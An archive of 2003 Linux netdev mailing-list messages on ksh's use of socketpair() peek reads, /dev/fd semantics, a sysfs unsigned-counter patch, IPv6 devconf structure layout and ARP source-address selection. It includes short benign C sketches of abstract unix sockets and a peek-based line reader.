<200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058987301.5520.111.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 23 Jul 2003 20:08:21 +0100 X-archive-position: 4271 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Mer, 2003-07-23 at 19:54, Glenn Fowler wrote: > named unix sockets reside in the fs namespace, no? > so they must be linked to a dir before use and unlinked after use > the unlink after use would be particularly tricky for the parent process > implementing > cmd <(cmd ...) ... Portable stuff yes, Linux also supports a pure socket namespace for them when the path starts with a nul character From davem@redhat.com Wed Jul 23 12:16:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:16:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJGuFl020450 for ; Wed, 23 Jul 2003 12:16:56 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id MAA11360; Wed, 23 Jul 2003 12:14:37 -0700 Date: Wed, 23 Jul 2003 12:14:36 -0700 From: "David S. 
Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723121436.10d53965.davem@redhat.com> In-Reply-To: <200307231911.PAA35164@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> <20030723120457.206dc02d.davem@redhat.com> <200307231911.PAA35164@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4272 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 15:11:47 -0400 (EDT) Glenn Fowler wrote: > On Wed, 23 Jul 2003 12:04:57 -0700 David S. Miller wrote: > > Is bash totally broken because of all this? Or does the problem only > > trigger when using (cmd) subprocesses in a certain way? > > bash uses pipe() so its ok > using socketpair() instead of pipe() introduces the problem > and we will now have to find an alternative to work around the > linux /dev/fd/N implementation I missed the reason why you can't use pipes and bash is able to, what is it? If it's the fchown() thing, why doesn't bash have this issue? 
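
A minimal sketch of the "pure socket namespace" Alan Cox mentions earlier in this thread: a Linux-specific AF_UNIX address whose path starts with a nul byte, so nothing is linked into a directory and nothing has to be unlinked afterwards. The helper names (abstract_addr, abstract_listen, abstract_connect) and the caller-chosen label are assumptions made for illustration; whether this helps with the cmd <(cmd ...) case is not settled in the thread.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Fill in an abstract-namespace address: sun_path[0] is '\0' and the
 * label follows it. Returns the address length, or 0 if the label
 * is empty or does not fit. */
static socklen_t abstract_addr(struct sockaddr_un *addr, const char *name)
{
	size_t n = strlen(name);

	if (n == 0 || n > sizeof(addr->sun_path) - 1)
		return 0;
	memset(addr, 0, sizeof(*addr));
	addr->sun_family = AF_UNIX;
	memcpy(addr->sun_path + 1, name, n);	/* leading nul stays in place */
	return (socklen_t)(offsetof(struct sockaddr_un, sun_path) + 1 + n);
}

/* Bind and listen on an abstract name. Returns the fd, or -1 on error. */
int abstract_listen(const char *name)
{
	struct sockaddr_un addr;
	socklen_t len = abstract_addr(&addr, name);
	int fd;

	if (len == 0)
		return -1;
	fd = socket(AF_UNIX, SOCK_STREAM, 0);
	if (fd < 0)
		return -1;
	if (bind(fd, (struct sockaddr *)&addr, len) < 0 || listen(fd, 1) < 0) {
		close(fd);
		return -1;
	}
	return fd;
}

/* Connect to an abstract name. Returns the fd, or -1 on error. */
int abstract_connect(const char *name)
{
	struct sockaddr_un addr;
	socklen_t len = abstract_addr(&addr, name);
	int fd;

	if (len == 0)
		return -1;
	fd = socket(AF_UNIX, SOCK_STREAM, 0);
	if (fd < 0)
		return -1;
	if (connect(fd, (struct sockaddr *)&addr, len) < 0) {
		close(fd);
		return -1;
	}
	return fd;
}
```

The name disappears when the last descriptor for the bound socket is closed, so the parent process has no cleanup step to get wrong. The trade-off is portability: this address form is a Linux extension.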
From gsf@research.att.com Wed Jul 23 12:29:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:29:12 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJT8Fl021391 for ; Wed, 23 Jul 2003 12:29:09 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NJkDJh029434; Wed, 23 Jul 2003 15:46:13 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id PAA77754; Wed, 23 Jul 2003 15:29:03 -0400 (EDT) Date: Wed, 23 Jul 2003 15:29:03 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231929.PAA77754@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> <20030723120457.206dc02d.davem@redhat.com> <200307231911.PAA35164@raptor.research.att.com> <20030723121436.10d53965.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4274 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 12:14:36 -0700 David S. Miller wrote: > I missed the reason why you can't use pipes and bash > is able to, what is it? 
we have some applications, ksh included, with semantics that require stdin be read at most one line at a time; an inefficient implementation of this does 1 byte read()s until newline is read; an efficient implementation does a peek read (without advancing the read/seek offset), determines how many chars to read up to and including the newline, and then read()s that much

linux has ioctl(I_PEEK) for stream devices and recv() for sockets, and neither of these work on pipes; if there is a linux alternative for pipes then we'd be glad to use it

we switched from pipe() to socketpair() to take advantage of the linux recv() peek read

From dgk@research.att.com Wed Jul 23 12:28:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:29:04 -0700 (PDT) Received: from mailman.research.att.com (H-135-207-24-32.research.att.com [135.207.24.32]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJSwFl021371 for ; Wed, 23 Jul 2003 12:28:59 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by mailman.research.att.com (8.12.8/8.12.8) with ESMTP id h6NJKv3j022959; Wed, 23 Jul 2003 15:20:57 -0400 Received: (from dgk@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id PAA75996; Wed, 23 Jul 2003 15:28:52 -0400 (EDT) Date: Wed, 23 Jul 2003 15:28:52 -0400 (EDT) From: David Korn Message-Id: <200307231928.PAA75996@raptor.research.att.com> X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: davem@redhat.com, dgk@research.att.com, gsf@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Re: kernel bug in socketpair() X-archive-position: 4273 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dgk@research.att.com Precedence: bulk X-list: netdev cc: gsf@research.att.com dgk@research.att.com linux-kernel@vger.kernel.org netdev@oss.sgi.com Subject: Re: 
Re: kernel bug in socketpair() --------
> I missed the reason why you can't use pipes and bash
> is able to, what is it?
>
> If it's the fchown() thing, why doesn't bash have this issue?
>
>

The reason is that we want to be able to peek ahead at data in the pipe before advancing. You can do this with recv(), but this doesn't work with pipes. On some systems you can use an ioctl() for this with pipes, but Linux doesn't support this, so ksh configures to use socketpair() instead of pipe() on Linux.

Without the ability to peek ahead on pipes, a command like

    cat file | { head -6 > /dev/null; cat ;}

to remove the first 6 lines of a file would be hard to implement unless head reads one byte at a time from the pipe. (OK, you could read 6 bytes at first if you want to optimize head.)

David Korn dgk@research.att.com

From davem@redhat.com Wed Jul 23 12:58:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:58:55 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJwjFl023664 for ; Wed, 23 Jul 2003 12:58:45 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id MAA11481; Wed, 23 Jul 2003 12:56:26 -0700 Date: Wed, 23 Jul 2003 12:56:25 -0700 From: "David S. 
Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723125625.77eda939.davem@redhat.com> In-Reply-To: <200307231929.PAA77754@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> <20030723120457.206dc02d.davem@redhat.com> <200307231911.PAA35164@raptor.research.att.com> <20030723121436.10d53965.davem@redhat.com> <200307231929.PAA77754@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4275 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 15:29:03 -0400 (EDT) Glenn Fowler wrote: > linux has ioctl(I_PEEK) for stream devices and recv() for sockets, > and neither of these work on pipes; if there is a linux alternative > for pipes then we'd be glad to use it Alan mentioned the pure-socket namespace we have for named unix sockets, but I don't think you can actually use it for your problem unfortunately. 
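
A minimal sketch of the peek-then-read technique Glenn Fowler and David Korn describe in this thread, assuming a connected stream socket such as one end of a socketpair(). The function name read_line_peek is hypothetical and this is not ksh's actual code; recv() with MSG_PEEK is the standard call it relies on.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Consume at most one line from a stream socket.
 * Step 1: peek at the pending data without advancing the read offset.
 * Step 2: find the newline and read() only up to and including it.
 * If no newline is pending, this sketch consumes the partial data;
 * a real reader would keep accumulating until the newline arrives.
 * Returns the number of bytes consumed, 0 on EOF, or -1 on error. */
ssize_t read_line_peek(int fd, char *buf, size_t cap)
{
	ssize_t seen = recv(fd, buf, cap, MSG_PEEK);
	char *nl;
	size_t want;

	if (seen <= 0)
		return seen;
	nl = memchr(buf, '\n', (size_t)seen);
	want = nl ? (size_t)(nl - buf) + 1 : (size_t)seen;
	return read(fd, buf, want);
}
```

Anything after the newline stays queued in the socket, so a child process that inherits the descriptor sees it untouched. That is the property that makes cat file | { head -6 > /dev/null; cat ;} work without one-byte reads.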
From davem@redhat.com Wed Jul 23 13:21:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 13:21:58 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NKLlFl025359 for ; Wed, 23 Jul 2003 13:21:48 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id NAA11569; Wed, 23 Jul 2003 13:19:29 -0700 Date: Wed, 23 Jul 2003 13:19:28 -0700 From: "David S. Miller" To: "Sean" Cc: netdev@oss.sgi.com Subject: Re: Trivial cosmetic unimportant issue (urgent) Message-Id: <20030723131928.324b1632.davem@redhat.com> In-Reply-To: <000901c3514e$59697bd0$7f0a0a0a@lappy7> References: <000901c3514e$59697bd0$7f0a0a0a@lappy7> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4276 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 15:12:24 -0400 "Sean" wrote: > Just a few days uptime and sysfs is reporting that i've transfered a _negative_ number of bytes! Any chance this could be > unsigned output instead? The display is created in a common net_device_stat_show but none of the others values should go negative > either. This should fix it. 
--- net/core/net-sysfs.c.~1~	Wed Jul 23 12:20:15 2003
+++ net/core/net-sysfs.c	Wed Jul 23 12:20:24 2003
@@ -186,7 +186,7 @@
 
 static ssize_t net_device_stat_show(unsigned long var, char *buf)
 {
-	return sprintf(buf, "%ld\n", var);
+	return sprintf(buf, "%lu\n", var);
 }
 
 /* generate a read-only statistics attribute */

From krkumar@us.ibm.com Wed Jul 23 15:34:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 15:35:11 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NMXlFl002421 for ; Wed, 23 Jul 2003 15:34:34 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6NMWrkh143790; Wed, 23 Jul 2003 18:32:53 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6NMWooc122290; Wed, 23 Jul 2003 18:32:51 -0400 Message-ID: <3F1F0CF7.5020909@us.ibm.com> Date: Wed, 23 Jul 2003 15:32:23 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 References: <200307210155.FAA31320@dub.inr.ac.ru> <20030723031351.4e9db07c.davem@redhat.com> In-Reply-To: <20030723031351.4e9db07c.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4277 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Hi Dave, > 1) Remove "void *sysctl;" from ipv6_devconf, move it into > inet6_dev ie. "void *cnf_sysctl;" update all code users. 
There is one problem with this that I am not able to figure out; perhaps I am overlooking it. addrconf_sysctl_register() gets called for ipv6_devconf_dflt, but there is no inet6_dev for this configuration, so is it possible to move the sysctl up (there is no 'up' :-)? I don't want to create a dummy inet6_dev for this. One way is to embed the actual config structure as follows:

    struct ipv6_devconf {
        void *sysctl;
        struct {
            forwarding;
            hop_limit;
            ...
        } u;
    };

and follow it up with #defines for all the elements, etc. Then I can use sizeof(ipv6_devconf.u) without this problem. Another way to do this is using pointer arithmetic:

    RTA_PUT(skb, IFLA_INET6_CONF, &idev->cnf.sysctl-&idev->cnf.forwarding, &idev->cnf);

(I guess you may not like it, based on your statement "pointers in it which makes usage sloppy"). I also noticed there is no sysctl_register for ipv6_devconf, but there is an unregister for that conf. Is that correct?

> 2) Move "struct ipv6_devconf" into some linux/*.h ipv6 header
> usable by users. Use an existing one if possible. Then
> make sure net/if_inet6.h includes this thing.

The only two ipv6-specific files in linux are ipv6.h and ipv6_route.h; neither is appropriate for sysctl stuff, I think. So should I create a new file, like the one that exists for ipv4_devconf in inetdevice.h?

> 3) Change "int" members of struct "ipv6_devconf" to "s32".

All members (except use_tempaddr) seem to be >=0; should I change the definition to __u32 instead? I am OK either way, just wondering which is the right way to do this.
Thanks, - KK From ja@ssi.bg Wed Jul 23 16:08:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 16:09:11 -0700 (PDT) Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NN8XFl004509 for ; Wed, 23 Jul 2003 16:08:35 -0700 Received: from localhost (IDENT:ja@localhost [127.0.0.1]) by u.domain.uli (8.11.6/8.11.6) with ESMTP id h6NN1kN01430; Thu, 24 Jul 2003 02:01:46 +0300 Date: Thu, 24 Jul 2003 02:01:46 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@u.domain.uli To: Carlos Velasco cc: netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address In-Reply-To: <200307231712000985.1CE20A63@192.168.128.16> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4278 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Wed, 23 Jul 2003, Carlos Velasco wrote: > When linux machine tries to find out the mac address of 192.168.128.60 with > ARP, it uses the loopback IP address (lo:2) as source instead of the IP address > of the ethernet interface (eth0). You are right, but the kernel tries to preserve the sender's IP. This helps the receiver to select the best interface to answer this ARP probe - the same one where the IP packet will be accepted later. As there are different setups, the tuning of the ARP handling can be done better with user tools such as arptables and iparp. 
http://sourceforge.net/projects/ebtables/ http://www.ssi.bg/~ja/#iparp > Regards, > Carlos Velasco Regards -- Julian Anastasov From rugolsky@telemetry-investments.com Wed Jul 23 16:27:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 16:28:33 -0700 (PDT) Received: from ti3.telemetry-investments.com (209-166-240-202.cust.walrus.com [209.166.240.202]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NNRHFl006277 for ; Wed, 23 Jul 2003 16:27:58 -0700 Received: from ti21.telemetry-investments.com (ti21 [192.168.8.21]) by ti3.telemetry-investments.com (8.11.6/8.11.6) with ESMTP id h6NNRB012933; Wed, 23 Jul 2003 19:27:11 -0400 Received: (from rugolsky@localhost) by ti21.telemetry-investments.com (8.11.6+Sun/8.11.6) id h6NNR6W00984; Wed, 23 Jul 2003 19:27:06 -0400 (EDT) Date: Wed, 23 Jul 2003 19:27:06 -0400 From: "Bill Rugolsky Jr." To: Alan Cox Cc: Glenn Fowler , davem@redhat.com, dgk@research.att.com, Linux Kernel Mailing List , netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-ID: <20030723192706.A962@ti21> Mail-Followup-To: "Bill Rugolsky Jr." 
, Alan Cox , Glenn Fowler , davem@redhat.com, dgk@research.att.com, Linux Kernel Mailing List , netdev@oss.sgi.com References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <1058982641.5520.98.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <1058982641.5520.98.camel@dhcp22.swansea.linux.org.uk>; from alan@lxorguk.ukuu.org.uk on Wed, Jul 23, 2003 at 06:50:41PM +0100 X-archive-position: 4279 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: brugolsky@telemetry-investments.com Precedence: bulk X-list: netdev On Wed, Jul 23, 2003 at 06:50:41PM +0100, Alan Cox wrote: > > otherwise there is a bug in the /dev/fd/N -> /proc/self/fd/N implementation > > and /dev/fd/N should be separated out to its (original) dup(atoi(N)) > > semantics > > I don't see a bug. I see differing behaviour between Linux and BSD on a > completely non standards defined item. Also btw nobody ever really wrote > a /dev/fd/ for Linux - it was just a byproduct of the proc stuff someone > noticed. I guess someone could write a Plan-9 style dev/fd or devfdfs > for Linux if they wanted. I first posted about this several years ago, and it came up again earlier in the year; see: http://hypermail.idiosynkrasia.net/linux-kernel/archived/2003/week14/0314.html As HPA and I had previously discussed, ->open() methods always return a new file struct, so providing the dup() semantics would require a restructuring of the ->open() methods -- unless, (and this is a dirty hack,) one creates a devfdfs that abuses the ERESTART_RESTARTBLOCK mechanism to restart the open() syscall with dup() instead. This requires some minor pollution to the open() syscall path to interpret the error return, but should require no other changes. 
Regards, Bill Rugolsky From carlosev@newipnet.com Wed Jul 23 16:42:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 16:42:49 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NNfWFl007304 for ; Wed, 23 Jul 2003 16:42:14 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 6D63A207AB; Thu, 24 Jul 2003 01:41:31 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 9372520776; Thu, 24 Jul 2003 01:41:19 +0200 (CEST) Message-ID: <200307240134030339.1EADABD4@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 01:34:03 +0200 From: "Carlos Velasco" To: "Julian Anastasov" Cc: netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6NNfWFl007304 X-archive-position: 4280 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 2:01 Julian Anastasov wrote: >> When linux machine tries to find out the mac address of 192.168.128.60 >with >> ARP, it uses the loopback IP address (lo:2) as source insted of the IP >address >> of the ethernet interface (eth0). > > You are right but the kernel tries to preserve the sender's >IP. This helps the receiver to select the best interface >to answer this ARP probe - the same where the IP packet will be >accepted later. As there are different setups, the tuning of the >ARP handling can be done better with user tools such as arptables >and iparp. Julian, The linux box is trying to do an ARP request with a source IP address that has not sense in that ethernet network. 
It's impossible to obtain a reply that way. Even if the receiver had a route to the loopback address through its ethernet interface, it would never reply to such an ARP request.

IMHO it's a bug. The loopback IP address makes no sense on the eth0 network.

Linux receives the packet destined to the loopback address and then performs a lookup in the route table to reach the src address. It takes the route (e.g. the default one), which is on the eth0 interface, and then does the ARP request. As the route is on eth0, it must use the src IP address of eth0, not the loopback address. If we have more than one IP address on eth0 (eth:0, eth:1), I suppose the route table must determine the right interface for ARP.

I have tried to reproduce the same problem with a Cisco router running IOS 12.2(15)T5, but it works fine on Cisco. I will try to test on Solaris 8, but I think the only problem is in Linux.

>http://sourceforge.net/projects/ebtables/
>http://www.ssi.bg/~ja/#iparp

I didn't know about these tools. I have taken a look at them, but they seem to be used for ARP filtering? I can't see how these tools can help me with this. My workaround with Linux is to use static ARP entries to solve this problem (arp -s).

Regards,
Carlos Velasco

From davem@redhat.com Thu Jul 24 00:10:07 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 00:10:22 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6O7A5Fl009795 for ; Thu, 24 Jul 2003 00:10:07 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id AAA12347; Thu, 24 Jul 2003 00:07:05 -0700
Date: Thu, 24 Jul 2003 00:07:05 -0700
From: "David S.
Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 Message-Id: <20030724000705.4662df54.davem@redhat.com> In-Reply-To: <3F1F0CF7.5020909@us.ibm.com> References: <200307210155.FAA31320@dub.inr.ac.ru> <20030723031351.4e9db07c.davem@redhat.com> <3F1F0CF7.5020909@us.ibm.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4281 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 15:32:23 -0700 Krishna Kumar wrote: > > 1) Remove "void *sysctl;" from ipv6_devconf, move it into > > inet6_dev ie. "void *cnf_sysctl;" update all code users. > > There is one problem with this that I am not able to figure out, perhaps I am > overlooking it. addrconf_sysctl_register() gets called for ipv6_devconf_dflt, > but there is no inet6_dev for this configuration, so is it possible to move the > sysctl up (there is no 'up' :-). I don't want to create a dummy inet6_dev for > this. One way is to embed the actual config structure as follows : Another idea is to define the user structure: struct ipv6_user_devconf { __u32 forwarding; ... }; Then: struct ipv6_kernel_devconf { struct ipv6_user_devconf vals; void *sysctl; }; It is similar to what you suggest. > > 2) Move "struct ipv6_devconf" into some linux/*.h ipv6 header > > usable by users. Use an existing one if possible. Then > > make sure net/if_inet6.h includes this thing. > > The only two ipv6 specific files in linux are ipv6.h and > ipv6_route.h, neither are appropriate for sysctl stuff I think. So > should I create a new file like the one for ipv4_devconf exists in > inetdevice.h ? I see no reason why ipv6.h is a bad place, heck we have an in6_ifreq there already. 
> > 3) Change "int" members of struct "ipv6_devconf" to "s32". > > All members (except use_tempaddr) seem to be >=0, should I change > the definition to __u32 instead ? __u32 sounds fine. From bdschuym@pandora.be Thu Jul 24 03:02:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 03:02:12 -0700 (PDT) Received: from adicia.telenet-ops.be (adicia.telenet-ops.be [195.130.132.56]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OA1rFl029479 for ; Thu, 24 Jul 2003 03:01:55 -0700 Received: from localhost (localhost.localdomain [127.0.0.1]) by adicia.telenet-ops.be (Postfix) with SMTP id E14D537F44; Thu, 24 Jul 2003 11:31:04 +0200 (MEST) Received: from 192.168.123.138 (D5762BF0.kabel.telenet.be [213.118.43.240]) by adicia.telenet-ops.be (Postfix) with ESMTP id 57AD237F1B; Thu, 24 Jul 2003 11:30:54 +0200 (MEST) From: Bart De Schuymer To: "Carlos Velasco" , "Julian Anastasov" Subject: Re: Bug? ARP with wrong src IP address Date: Thu, 24 Jul 2003 11:30:53 +0200 User-Agent: KMail/1.5 Cc: netdev@oss.sgi.com References: <200307240134030339.1EADABD4@192.168.128.16> In-Reply-To: <200307240134030339.1EADABD4@192.168.128.16> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200307241130.53262.bdschuym@pandora.be> X-archive-position: 4282 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bdschuym@pandora.be Precedence: bulk X-list: netdev On Thursday 24 July 2003 01:34, Carlos Velasco wrote: > >http://sourceforge.net/projects/ebtables/ > >http://www.ssi.bg/~ja/#iparp > > I didn't know about these tools. > I have taken a look on them, but they seem to be used for arp filtering? > I can't see how these tools can help me into this. arptables can mangle the arp payload with the "mangle" module. You'll need a very recent kernel for this, net/ipv4/netfilter/arpt_mangle.c must exist. 
